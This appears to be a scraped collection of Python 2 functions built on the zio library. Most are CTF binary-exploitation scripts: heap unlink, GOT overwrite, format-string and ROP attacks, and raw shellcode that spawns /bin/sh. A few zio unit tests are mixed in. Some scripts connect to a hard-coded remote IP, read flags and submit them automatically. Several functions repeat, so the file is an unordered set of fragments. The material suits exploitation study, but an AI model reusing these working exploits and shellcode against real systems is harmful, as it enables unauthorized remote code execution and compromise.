def test_tty_raw_out(self): s = [] ans = [] for i in range(10): r = random.randint(0, 1) s.append('%d%s' % (i, r and '\\r\\n' or '\\n')) ans.append('%d%s' % (i, r and '\r\n' or '\n')) ans = ''.join(ans) cmd = "printf '" + ''.join(s) + "'" io = zio(cmd, stdout=TTY_RAW) rd = io.read() io.close() self.assertEqual(rd, ans) unprintable = [ chr(c) for c in range(256) if chr(c) not in string.printable ] for i in range(10): random.shuffle(unprintable) from zio import which py = which('python2') or which('python') self.assertNotEqual(py, None) io = zio(' '.join([ py, '-u', os.path.join(os.path.dirname(sys.argv[0]), 'myprintf.py'), "'\\r\\n" + repr(''.join(unprintable))[1:-1] + "\\n'" ]), stdout=TTY_RAW, print_read=COLORED(REPR)) rd = io.read() self.assertEqual(rd, "\r\n" + ''.join(unprintable) + "\n")
def cmdline(self, cmd, **kwargs): print '' socat_exec = ',pty,stderr,ctty' if 'socat_exec' in kwargs: socat_exec = kwargs['socat_exec'] del kwargs['socat_exec'] io = zio(cmd, **kwargs) yield io io.close() print '"%s" exited: ' % cmd, io.exit_code for _ in range(16): port = random.randint(31337, 65530) p = subprocess.Popen([ 'socat', 'TCP-LISTEN:%d' % port, 'exec:"' + cmd + '"' + socat_exec ]) time.sleep(0.2) if p.returncode: continue try: io = zio(('127.0.0.1', port), **kwargs) yield io except socket.error: continue io.close() p.terminate() p.wait() break
def cmdline(self, cmd, **kwargs): print '' socat_exec = ',pty,stderr,ctty' if 'socat_exec' in kwargs: socat_exec = kwargs['socat_exec'] del kwargs['socat_exec'] io = zio(cmd, **kwargs) yield io io.close() print '"%s" exited: ' % cmd, io.exit_code for _ in range(16): port = random.randint(31337, 65530) p = subprocess.Popen(['socat', 'TCP-LISTEN:%d' % port, 'exec:"' + cmd + '"' + socat_exec]) time.sleep(0.2) if p.returncode: continue try: io = zio(('127.0.0.1', port), **kwargs) yield io except socket.error: continue io.close() p.terminate() p.wait() break
def mk(target, debug=True): if debug: return zio(target, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'yellow'), timeout=10000) else: return zio(target, print_read=False, print_write=False, timeout=10000)
def test_tty(self): print '' io = zio('tty') out = io.read() self.assertEqual(out.strip(), 'not a tty', repr(out)) io = zio('tty', stdin = TTY) out = io.read() self.assertTrue(out.strip().startswith('/dev/'), repr(out))
def test_tty(self): print '' io = zio('tty') out = io.read() self.assertEqual(out.strip(), 'not a tty', repr(out)) io = zio('tty', stdin=TTY) out = io.read() self.assertTrue(out.strip().startswith('/dev/'), repr(out))
def exp(target): #io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green')) io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) new_sc(io, 'a' * 0x80) #0x603010 new_sc(io, 'b' * 0x80) #0x6030c0 new_sc(io, '/bin/sh;' + 'c' * 0x78) #0x603170 ptr_addr = 0x00000000006016d0 # rax rdx payload = l64(0) + l64(0x81) + l64(ptr_addr - 0x18) + l64( ptr_addr - 0x10) + 'a' * 0x60 + l64(0x80) + l64(0x90) edit_sc(io, 0, payload) # change *0x6016d0 = 0x6016b8 delete_sc(io, 1) free_got = 0x0000000000601600 payload2 = l64(0) + l64(1) + l64(0x80) + l64(free_got) edit_sc(io, 0, payload2) free_addr = list_sc(io) print hex(free_addr) #local system_addr = 0x00007FFFF7A5B640 system_addr = 0x0000000000044C40 + free_addr - 0x0000000000082DA0 ''' libc_base = free_addr - 0x0000000000082DF0 system_addr = libc_base + 0x0000000000046640 ''' edit_sc(io, 0, l64(system_addr)) delete_sc(io, 2) io.interact()
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \ print_write=COLORED(RAW, 'green')) add_function(io, 'fun1', 'para1', 'data1') add_function(io, 'fun2', 'para2', 'data2') enter_edit(io, 2) edit_comments(io, 100, 'comment') add_read_write(io, 'a' * 80, 'b' * 80) heap_ptr = 0x6036f0 payload = 'a' * 0x60 + l64(0) + l64(0) + l64(0) + l64(0x51) + l64( heap_ptr - 0x18) + l64(heap_ptr - 0x10) payload += 'a' * 0x30 + l64(0x50) + l64(0xa0) enter_edit(io, 1) edit_comments( io, 200, 'a' * 0x30 + l64(0) + l64(0x31) + 'a' * 0x20 + l64(0) + l64(0x21)) enter_edit(io, 2) edit_comments(io, -1, payload) add_read_write(io, '', 'b' * 99) #g_readall :0x0000000000604460 #g_writeall: 0x0000000000604400 #g_ptr: 0x0000000000604050 #comment: 0x0000000000604390 #0x00000000006044c0 interact(io)
def exp(target): io = zio('./fsb', print_read = False, print_write = False) io.read_until('(1)') io.writeline('%2217$x') leak = 0 try : io.read_line() leak = int(io.read_until('\n')[0:-1], 16) except : pass print hex(leak) if leak != 0x804a060: io.close() return else : print '\n[+] find address of key' io.read_until('(2)') io.writeline('%2217$lln') io.read_until('(3)') io.writeline('0') io.read_until('(4)') io.writeline('0') io.read_until('key :') io.writeline('0') print '[+] your shell !' io.interact() io.close() exit()
def get_io(target): ELF(target) io = zio(target, timeout=9999, print_read=COLORED(RAW, "green"), print_write=COLORED(RAW, "blue")) return io
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \ print_write=COLORED(RAW, 'green')) io.gdb_hint() io.read_until('Bucko') count_dict = {} for i in range(0xd1): count = 16000 / 0xd1 if i < 16000 % 0xd1: count += 1 count_dict[i] = count system_plt = 0x0000000000400FD0 pop_rdi_ret = 0x0000000000402703 sh = 0x4008ca payload = l32(8001) + l32(0x20) + 'a' * 8 payload += l64(pop_rdi_ret) + l64(sh) + l64(system_plt) for c in payload: count_dict[ord(c)] -= 1 d = '' for i in range(0xd1): d += chr(i) * count_dict[i] d = d[0:0x18] + payload + d[0x18:] io.gdb_hint() io.writeline(d) interact(io)
def exp(target): io = zio(target, timeout=10000, print_read=False, print_write=False) mem = create_note(io) while mem[1] > 0xf0000000: delete_note(io, mem[0]) mem = create_note(io) print hex(mem[1]) write_note(io, mem[0], shellcode.rjust(0x100, '\x90')) # stack grow for i in range(0, 0x1000): secret(io, 'A' * 0x400) print i mem1 = create_note(io) while (mem1[1] < 0xffd60000) or (mem[1] > 0xffffd000): delete_note(io, mem1[0]) mem1 = create_note(io) note = read_note(io, mem1[0]) print "[-] memory address: " + hex(mem1[1]) print "[-] note: " + note.encode('hex') + '\n' if (mem1[1] >= 0xf7ffc000) and (mem1[1] < 0xffd60000): if note != '\x0a': break payload = l32(mem[1]) * (0x1000 / 4 - 1) print '\n-------------find it-------------------' print '[+] write to : ' + hex(mem1[1]) print '[+] with payload : ' + payload.encode('hex') write_note(io, mem1[0], payload) exit_ret(io) io.interact() io.close()
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \ print_write=COLORED(RAW, 'green')) add_function(io, 'fun1', 'para1', 'data1') add_function(io, 'fun2', 'para2', 'data2') enter_edit(io, 2) atoi_got = 0x603230 edit_comments(io, 666, 'a' * 0x18 + l64(atoi_got)) #fun1 0x604070 #fun2 0x604200 comment:0x604390 delete_function(io, 2) add_function(io, 'fun3', 'para3', 'data3') add_function(io, 'fun4', 'para4', 'data4') add_function(io, 'fun5', 'para5', 'data5') show_function(io, 3) io.read_until('#') atoi = l64(io.readline()[:-1].ljust(8, '\x00')) print hex(atoi) base = atoi - 0x0000000000036E80 system = base + 0x0000000000045390 #base = atoi - 0x0000000000033C10 #system = base + 0x000000000003E8B0 enter_edit(io, 3) edit_comments(io, 8, l64(system)[:-1]) io.read_until('Option') io.writeline('sh') interact(io)
def exp(target): p = 7 q = 37 e = 7 d = egcd(e, (p - 1) * (q - 1)) # print 'p=%d\nq=%d\ne=%d\nd=%d\n' % (p, q, e, d) # io = zio(target, timeout = 100000, print_read = COLORED(RAW, 'red'), print_write = COLORED(RAW, 'yellow')) io = zio(target, timeout=100000, print_read=False, print_write=False) set_key(io, p, q, e, d) plt_system = 0x004007c0 got_printf = 0x00602028 got_putchar = 0x00602000 adr_ret = 0x0040122b payload = get_cypher( io, '%83$n%79$n%064lx%78$hn%82$hn%01920lx%77$hn%02667lx%81$hn;/bin/sh\x00') payload += l64(got_printf) payload += l64(got_printf + 2) payload += l64(got_printf + 4) payload += l64(got_printf + 6) payload += l64(got_putchar) payload += l64(got_putchar + 2) payload += l64(got_putchar + 4) payload += l64(got_putchar + 6) decrypt(io, payload) io.interact()
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) io.gdb_hint() add_domain(io, '0' * (0x800 - 16 - 8 - 1 - 4 - 3)+'12') #0 0x804c008 0x804c7f0 add_domain(io, '0'*0x770) #1 0x804c878 0x804cff0 top=0x804d070 add_domain(io, '0'*0x1a0) #2 add_domain(io, '/bin/sh'+'0'*0x88) #3 0x0804d340 0x0804d2a8 add_domain(io, '0'*0x10) #4 0x0804d3e0 add_domain(io, '0'*0x5b0) #5 add_domain(io, '0'*0x770) #6 add_domain(io, '0'*0x770) #7 add_domain(io, '0'*0x770) #8 add_domain(io, '0'*0x770) #9 add_domain(io, '/bin/sh;'+'0'*(0x770-8)) #10 remove_domain(io, 1) lookup_domain(io, 0) remove_domain(io, 2) # top = 0x804d070 unsort=0x804d218 ptr_addr = 0x0804b0a4 add_domain(io, '0'*0x90) #1 0x0804d220 free_got = 0x0804b004 payload2 = 272*'1' + l32(free_got) add_domain(io, payload2) free = list_domain(io) #local system = 0xb7e55060 #remote system = free - 0x781b0 + 0x3d170 edit_domain_name(io, 1, l32(system)) remove_domain(io, 10) io.interact()
def exp(target): #io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green')) io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) new_sc(io, 'a'*0x80) #0x603010 new_sc(io, 'b'*0x80) #0x6030c0 new_sc(io, '/bin/sh;'+'c'*0x78) #0x603170 ptr_addr = 0x00000000006016d0 # rax rdx payload = l64(0) + l64(0x81) + l64(ptr_addr-0x18) + l64(ptr_addr-0x10) + 'a'*0x60 + l64(0x80) + l64(0x90) edit_sc(io, 0, payload) # change *0x6016d0 = 0x6016b8 delete_sc(io, 1) free_got = 0x0000000000601600 payload2 = l64(0) + l64(1) +l64(0x80) + l64(free_got) edit_sc(io, 0, payload2) free_addr = list_sc(io) print hex(free_addr) #local system_addr = 0x00007FFFF7A5B640 system_addr = 0x0000000000044C40 + free_addr - 0x0000000000082DA0 ''' libc_base = free_addr - 0x0000000000082DF0 system_addr = libc_base + 0x0000000000046640 ''' edit_sc(io, 0, l64(system_addr)) delete_sc(io, 2) io.interact()
def exp(target): # leak info leak = os.popen('./leak ' + str(int(time.time()) + random.randint(-10, 10))).read().split('*')[0:-1] leak = [int(l) for l in leak] io = zio(target, print_read=False, print_write=False) # calc canary io.read_until('input captcha : ') captcha = int(io.read_line()[0:-1]) canary = captcha - leak[1] - leak[2] + leak[3] - leak[4] - leak[5] + leak[ 6] - leak[7] print '[+] leak canary : ' + hex(ctypes.c_uint32(canary).value) io.writeline(str(captcha)) io.read_until('Encode your data with BASE64 then paste me!') plt_system = 0x8048880 adr_gbuf = 0x804b0e0 payload = 'A' * 0x200 payload += l32(canary) payload += 'A' * 0xc payload += l32(plt_system) payload += l32(0xdeadbeef) payload += l32(adr_gbuf + 0x2d1) io.writeline(base64.b64encode(payload) + 'A/bin/sh') io.interact()
def get_io(target): ELF("./main") io = zio(target, timeout=9999, print_read=COLORED(RAW, 'green'), print_write=COLORED(RAW, 'blue')) return io
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) io.gdb_hint() add_domain(io, '0' * (0x800 - 16 - 8 - 1 - 4 - 3)+'12') #0 0x804c008 0x804c7f0 add_domain(io, '0'*0x770) #1 0x804c878 0x804cff0 top=0x804d070 add_domain(io, '0'*0x1a0) #2 add_domain(io, '/bin/sh'+'0'*0x88) #3 0x0804d340 0x0804d2a8 add_domain(io, '0'*0x10) #4 0x0804d3e0 add_domain(io, '0'*0x5b0) #5 add_domain(io, '0'*0x770) #6 add_domain(io, '0'*0x770) #7 add_domain(io, '0'*0x770) #8 add_domain(io, '0'*0x770) #9 add_domain(io, '/bin/sh;'+'0'*(0x770-8)) #10 remove_domain(io, 1) lookup_domain(io, 0) remove_domain(io, 2) # top = 0x804d070 unsort=0x804d218 ptr_addr = 0x0804b0a4 add_domain(io, '0'*0x90) #1 0x0804d220 free_got = 0x0804b004 payload2 = 272*'1' + l32(free_got) add_domain(io, payload2) free = list_domain(io) #local system = 0xb7e55060 #remote #system = free - 0x781b0 + 0x3d170 edit_domain_name(io, 1, l32(system)) remove_domain(io, 10) io.interact()
def get_io(target): read_mode = COLORED(RAW, "green") write_mode = COLORED(RAW, "blue") io = zio( target, timeout=9999) #, print_read = read_mode, print_write = write_mode) return io
def exp(target): io = zio(target, timeout=30, print_read=COLORED(NONE, 'red'), \ print_write=COLORED(NONE, 'green')) #io.read_until('Token') #io.writeline('NxArhGPKLMmen9Y9QPePHSBbFqQPiqnU') io.read_until('?') io.writeline('S') d = int(send_message(io, '%63$p'), 16) libc_base = d - 0x0000000000020830 print 'libc_base', hex(libc_base) system = libc_base + 0x0000000000045390 binsh = libc_base + 0x000000000018CD17 pop_rdi_ret = 0x0000000000402723 stack = int(send_message(io, '%46$p'), 16) print 'stack', hex(stack) free_got = 0x00000000006040A8 addr = l64(free_got)+l64(free_got+2)+l64(free_got+4) writes = {} writes[0] = system & 0xffff writes[1] = (system>> 16) & 0xffff writes[2] = (system>> 32) & 0xffff payload = 'aaa;sh;' printed = len(payload) for where, what in sorted(writes.items(), key=operator.itemgetter(1)): delta = (what - printed) & 0xffff if delta > 0: if delta < 8: payload += 'A' * delta else: payload += '%' + str(delta) + 'x' payload += '%' + str(14 + where) + '$hn' printed += delta payload = payload.ljust(48, 'a') payload += addr print len(payload) do_fmt2(io, payload) payload = '\x03sh;' io.write(l16(1)+l16(0)+l32(len(payload)+8)) io.write(payload) io.writeline('echo 123') io.read_until('123\n') io.writeline('./bin/cat flag/flag') flag = io.readline()[:-1].strip() print target print 'flag', flag submit_flag(flag) io.close()
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \ print_write=COLORED(RAW, 'green')) io.read_until(':') io.writeline(str(92233720368547759)) base, rsp, cookie = show(io, 1) print 'base', hex(base) fake_rsp = rsp - 0x48 pop_rdi_ret = base + 0x000000000001523 addr = l64(rol(fake_rsp ^ cookie)) + l64(rol(pop_rdi_ret ^ cookie)) print HEX(addr) edit(io, 1, 0, "", addr, "") io.read_until('>>') payload = '5;' + 'a' * 6 puts_got = 0x0000000000202018 + base puts_plt = 0x9a0 + base main = base + 0x00000000000013ff payload += l64(puts_got) + l64(puts_plt) + l64(main) io.writeline(payload) puts_addr = l64(io.readline()[:-1].ljust(8, '\x00')) ''' base = puts_addr - 0x000000000006F5D0 system = base + 0x0000000000045380 print 'system', hex(system) binsh = base + 0x000000000018C58B ''' base = puts_addr - 0x000000000006FD60 print 'base', hex(base) system = base + 0x0000000000046590 binsh = base + 0x000000000017C8C3 #io.gdb_hint() io.read_until(':') io.writeline(str(92233720368547759)) fake_rsp = rsp - 0x80 addr = l64(rol(fake_rsp ^ cookie)) + l64(rol(pop_rdi_ret ^ cookie)) print HEX(addr) io.gdb_hint() edit(io, 1, 0, "", addr, "") io.read_until('>>') payload = '5;' + 'a' * 6 payload += l64(binsh) + l64(system) + l64(main) io.writeline(payload) #io.gdb_hint() interact(io)
def get_io(target): r_m = COLORED(RAW, "green") w_m = COLORED(RAW, "blue") r_m = False w_m = False #io = zio(target, timeout = 9999, print_read = r_m, print_write = w_m) io = zio(target, timeout = 20, print_read = r_m, print_write = w_m, env={"LD_PRELOAD":libc_file_path}) return io
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) write_any(io) io.interact()
def get_io(target): io = zio(target, timeout = 9999) io.read_until("input captcha : ") captcha = io.read_until("\n") io.write(captcha) io.read_until("then paste me!\n") return io, captcha
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) pop_rdi_ret = 0x0000000000400603 pop_rsi_r15_ret = 0x0000000000400601 leak_addr = 0x600ef0 write_plt = 0x0000000000400430 pop_rbp_ret = 0x4004d0 leak_rop = l64(pop_rsi_r15_ret) + l64(leak_addr) + l64(0) + l64( pop_rdi_ret) + l64(1) + l64(write_plt) leak_rop += l64(pop_rbp_ret) + l64(0x601f00) + l64(0x400582) for i in range(0, len(leak_rop), 8): write_16byte(io, 0x601b00 + i, leak_rop[i:i + 8] + '\x00' * 8) leave_ret = 0x40059d leak_stack_povit = 'a' * 0x10 + l64(0x601b00 - 0x8) + l64(leave_ret) io.write(leak_stack_povit) io.read_until(':') link_map_addr = l64(io.read(8)) + 0x28 print hex(link_map_addr) r_offset = 0x601970 # a writable addr r_sym = 0x155e8 fake_relro = generate_fake_relro(r_offset, r_sym).ljust(0x20, '\x00') st_name = 0x200d68 fake_sym = generate_fake_sym(st_name).ljust(0x20, '\x00') write_16byte(io, link_map_addr + 0x1c8, '\x00' * 0x10) #write_16byte(io, 0x600858, l64(0x6ffffff0)+l64(0x3d57d6)) for i in range(0, len(fake_relro), 8): write_16byte(io, 0x601058 + i, fake_relro[i:i + 8] + '\x00' * 8) for i in range(0, len(fake_sym), 8): write_16byte(io, 0x601078 + i, fake_sym[i:i + 8] + '\x00' * 8) write_16byte(io, 0x601098, 'system'.ljust(16, '\x00')) write_16byte(io, 0x601a50, '/bin/sh'.ljust(16, '\x00')) plt0 = 0x400420 rop = l64(pop_rdi_ret) + l64(0x601a50) index = 0x155dc rop += l64(plt0) + l64(index) for i in range(0, len(rop), 8): write_16byte(io, 0x601980 + i, rop[i:i + 8] + '\x00' * 8) stack_povit = 'a' * 0x10 + l64(0x601980 - 0x8) + l64(leave_ret) io.write(stack_povit) interact(io)
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) sh= 0x804828e system = 0x080483E0 write_dword(io, 0x2c, system) write_dword(io, 0x2c+8, sh) write_byte(io, 1, 1) write_byte(io, 1, 1) io.interact()
def exp(s): io = zio('./tlc') io.read_until(':') io.writeline(s) try: io.read_until(':') data = io.readline() io.close() except: pass
def attack(host='127.0.0.1', port=1234, shell=False): if host == local: debug = 1 io = zio(local, print_read=COLORED(REPR,'yellow'),\ print_write=COLORED(REPR,'blue')) else: debug = 0 io = zio((host, port), print_read=False, print_write=False) start(io, debug) if shell: return io else: flag = '' io.write(cmd+'\n') flag = io.readline().strip() io.close() return flag
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \ print_write=COLORED(RAW, 'green')) login(io) add_req(io, '11111111') add_req(io, '22222222') add_req(io, '33333333') add_req(io, '44444444') add_req(io, '55555555') add_req(io, '66666666') add_req(io, '77777777') del_req(io, 1) del_req(io, 3) del_req(io, 5) #leak change_req(io, 0, 'a'*0x47) print_req(io) io.read_until('a'*0x47+'\n') leak_value = l64(io.readline()[:-1].ljust(8, '\x00')) print hex(leak_value) heap_base = leak_value - 0xe0 atoi_got = 0x00000000006099D8 payload = l64(atoi_got-0x18)*8 change_req(io, 0, payload + l64(0x0000000000609E80)+l64(0x0000000000609E80)) change_req(io, 2, 'b'*0x40 + l64(0x0000000000609E80)+l64(0x0000000000609E80)) change_req(io, 4, 'c'*0x40 + l64(0x0000000000609E80)+l64(0x0000000000609E80)) buf = "" buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05" buf += "\xef\xff\xff\xff\x48\xbb\xaa\xfb\x07\x50\x07\x4b\x98" buf += "\xc5\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4" buf += "\xc0\xc0\x5f\xc9\x4f\xf0\xb7\xa7\xc3\x95\x28\x23\x6f" buf += "\x4b\xcb\x8d\x23\x1c\x6f\x7d\x64\x4b\x98\x8d\x23\x1d" buf += "\x55\xb8\x0f\x4b\x98\xc5\x85\x99\x6e\x3e\x28\x38\xf0" buf += "\xc5\xfc\xac\x4f\xd9\xe1\x44\x9d\xc5" change_req(io, 6, buf) #change_req(io, 2, 'b'*0x50) #io.gdb_hint() sc_addr = 0x6161616161616161 # shellcode64 add_req(io, '88888') payload2 = '\x68'+l64(heap_base+0x1b0)+'\xc3' payload2 = payload2.ljust(0x10, 'a') change_req(io, 3, payload2+l64(heap_base+0x30)+l64(heap_base+0x60)) add_req(io, '99999') menu(io, 1) interact(io)
def connect(): io = zio(('119.254.101.232', 8888)) regex = re.compile('SHA\((.*?)\) = ([\d\w]+)') _reg, _hash = regex.findall(io.read_until('\n'))[0] for candidate in exrex.generate(_reg): shasum = sha1(candidate).hexdigest() if shasum == _hash: io.write(candidate + '\n') break io.read_until('your answer\n') return io
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) add_tv(io, 'aaa', 100, 200, 'bbbb') #0x602010 add_tv(io, 'aaa', 100, 200, 'bbbb') #0x6020f0 add_tv(io, 'aaa', 100, 200, 'bbbb') #0x6021d0 remove_entry(io, 'aaa') malloc_got = 0x0000000000601C58 db_addr = 0x601dc0 movie_vt = 0x00000000004015b0 payload = l64(movie_vt) + 'a' * 8 + '\x00' * 56 + 'b' * 8 + '\x00' * ( 0x80 - 8) + l64(0x0000006443480000) + l64(malloc_got) print len(payload) add_movie(io, 'ccc', payload, 300, 'eeee') #0x602010 0x602110 add_tv(io, 'hhh', 100, 200, 'bbbb') #0x6021e0 add_tv(io, 'hhh', 100, 200, 'bbbb') #0x6022c0 add_tv(io, 'hhh', 100, 200, 'bbbb') #0x6023a0 remove_entry(io, 'hhh') payload = l64(movie_vt) + 'a' * 8 + '\x00' * 56 + 'b' * 8 + '\x00' * ( 0x80 - 8) + l64(0x0000006443480000) + l64(db_addr) add_movie(io, 'ccc', payload, 300, 'eeee') malloc_addr, heap_addr = show_all(io) io.gdb_hint() add_tv(io, 'jjj', 100, 200, 'bbbb') #0x6023b0 add_tv(io, 'jjj', 100, 200, 'bbbb') #0x602490 add_tv(io, 'jjj', 100, 200, 'bbbb') #0x602570 remove_entry(io, 'jjj') #local addr2 = malloc_addr - 0x00007FFFF7277750 + 0x00007FFFF723B52C #remote #addr2 = malloc_addr - 0x0000000000082750 + 0x000000000004652c fake_vt = 0x6023b0 + 8 - 0x602010 + heap_addr payload = l64(fake_vt) + '/bin/sh;' + '\x00' * 56 + 'b' * 8 + '\x00' * ( 0x80 - 8) + l64(0x0000006443480000) + l64(db_addr) print len(payload) add_movie(io, l64(addr2), payload, 300, 'eeee') io.writeline('4') io.interact()
def leak_got(offset): io = zio((host, 1234), print_write = False, print_read = False, timeout = 100000) rop = 'A' * 8200 + l64(stack_cookie) + l64(saved_rbp) rop += l64(base + 0xec6) + 'A' * 8 + l64(5) + 'B' * 8 + l64(base + 0x202018) + 'C' * 8 + l64(base + offset) + l64(4) rop += l64(base + 0xeb0) io.write(rop) io.read_until('thanks.\n') left = io.read(8) return l64(left + '\x00' * (8 - len(left)))
def pwn (target, dis): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) #io = zio(target, timeout=10000, print_read=None, print_write=None) input_info(io) dian_cai(io, 'aaa', 1) read_got = 0x0804b010 atoi_got = 0x0804B038 #puts_got = 0x0804b02c payload = 'a'*32+l32(atoi_got-4) dian_cai(io, payload, 2) atoi_addr = link_heap(io) #system_addr = 0xf7e39190 #io.gdb_hint() payload2 = 'a'*32+l32(0x0804B1C0-8) dian_cai(io, payload2, 3) sublit(io) payload = 'a'*4+l32(atoi_got) offset_read = 0x000da8d0 offset_system = 0x0003e800 offset_puts = 0x000656a0 offset_atoi = 0x0002fbb0 print "dis:",hex(dis), "com:", hex(offset_system - offset_atoi) #libc_base = atoi_addr - offset_atoi #system_addr = libc_base + offset_system #system_addr = libc_base + offset_puts system_addr = atoi_addr + dis system_addr = struct.unpack("i", l32(system_addr))[0] sublit(io) dian_cai(io, payload, system_addr) #io.writeline('/bin/cat /home/shaxian/flag') io.writeline('/bin/sh\n') io.interact() #data = io.read(1024) data = io.read_until_timeout(1) if "RCTF" in data or "No such file" in data: print "herre" file_w = open("flga-4002", 'w') data += "dis:" + hex(dis) + "com:" + hex(offset_system - offset_atoi) file_w.write(data) file_w.close() exit(0) else: io.close()
def test_attach_socket(self): print('') for _ in range(4): port = random.randint(31337, 65530) p = subprocess.Popen([ 'socat', 'TCP-LISTEN:%d,crlf' % port, 'SYSTEM:"echo HTTP/1.0 200; echo Content-Type: text/plain; echo; echo Hello, zio;"' ]) time.sleep(0.2) if p.returncode: continue try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.1', port)) line = b'' while True: c = s.recv(1) if not c: break else: line += c if line.find(b'\n') > -1: break assert line.rstrip() == b"HTTP/1.0 200", repr(line) io = zio(s) line = io.readline() self.assertEqual(line.rstrip(), b"Content-Type: text/plain", repr(line)) line = io.readline() line = io.readline() self.assertEqual(line.rstrip(), b"Hello, zio", repr(line)) io.end() io.close() except socket.error: continue p.terminate() for _ in range(10): r = p.poll() if r is not None: break time.sleep(0.2) else: try: p.kill() except: # NOQA pass break
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) sh = 0x804828e system = 0x080483E0 write_dword(io, 0x2c, system) write_dword(io, 0x2c + 8, sh) write_byte(io, 1, 1) write_byte(io, 1, 1) io.interact()
def dump_libc(write_addr, size): io = zio((host, 1234), print_write = False, print_read = False, timeout = 100000) rop = l64(write_addr) + 'A' * (8200 - 8) + l64(stack_cookie) + l64(saved_rbp) rop += l64(base + 0xec6) + 'A' * 8 + l64(0) + 'B' * 8 + l64(saved_rbp - 0x70 - 0x2000) + l64(size) + l64(libc_base) + l64(4) rop += l64(base + 0xeb0) io.write(rop) io.read_until('thanks.\n') left = io.read() io.close() return left
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) store_name='name'*15+'xxx' item_name='a'*31 description='b'*79 create_store(io,store_name,item_name,description) length=len('Blackberry OS Phone Z price: -2147483648 CNY description: ') generate(io) for x in xrange(15): if x == 0: item_name=payload+'a'*(31-len(payload)) description = payload+'Z'*(79-len(payload)) if x == 14: description=payload+'Z'*(74-len(payload))+l32(0x08049b74)+'Z' add_item(io,item_name,description) generate(io) #改got表 io.read_until('? ') io.writeline('b') io.read_until('? ') io.writeline('2') io.read_until('? ') io.writeline('b') io.read_until('? ') io.gdb_hint() io.writeline(str(addr_blackberry-length)) io.read_until('? ') io.writeline('b') io.read_until("? ") io.writeline(str(got_stack_fail)) #栈溢出 io.read_until('? ') io.writeline('c') io.read_until('? ') io.writeline('a') payload2='d'*32+l32(addr_puts)+l32(addr_store_cmd)+l32(got_atoi) io.read_until('? ') io.writeline(payload2) io.read_until('Long.\n') data=io.read(4) print 'data:%s'%data io.read_until('? ') real_atoi=l32(data) print hex(real_atoi) #bin/sh real_system=real_atoi-offset_atoi+offset_system real_bin=real_atoi-offset_atoi+offset_bin payload3='d'*32+l32(real_system)+'1234'+l32(real_bin) io.writeline(payload3) io.read_until('Long.\n') io.interact()
def exp3(target): io = zio(target, timeout=30, print_read=COLORED(RAW, 'red'), \ print_write=COLORED(RAW, 'green')) payload = 'hri\x01\x01\x814$\x01\x01\x01\x011\xd2Rj\x08ZH\x01\xe2RH\x89\xe2jhH\xb8/bin///sPj;XH\x89\xe7H\x89\xd6\x99\x0f\x05' add(io, 0x3eeb, 1, payload) index = (0x2030a0 - 0x203020) / 8 payload = l32(0xdeadfafa) + l8(index) io.write(payload) io.writeline('./bin/cat flag/flag') flag = io.readline()[:-1].strip() print target print 'flag', flag submit_flag(flag) io.close()
def a_byte(num): global payload address = 0 while address <= 255: io = zio((ip, 1234), timeout = 100000, print_read = REPR, print_write = COLORED(REPR)) io.write(payload + chr(address) ) io.read_until('thanks.') io.readline() data = io.readline() if data != '': payload += chr(address) result = my_hex(address) #log("address_"+ str(num) + ": " + result, 'red') return result address += 1
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green')) add_item(io, '123', '111') add_item(io, '124', '112') buf_addr = 0x6016c0 # point to the address of buffer edit_item(io, 1, '222', '2'*0x10 + '3'*0x10 + '\xc2\x16\x60')# 覆盖第二个node->cleanup地址 # http://shell-storm.org/shellcode/files/shellcode-806.php shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" io.read_until('Quit\n') io.writeline('4') io.read_until(':') io.writeline('2\x00' + shellcode)#激发第二个node->cleanup 并且把shellcode填入buffer io.interact()
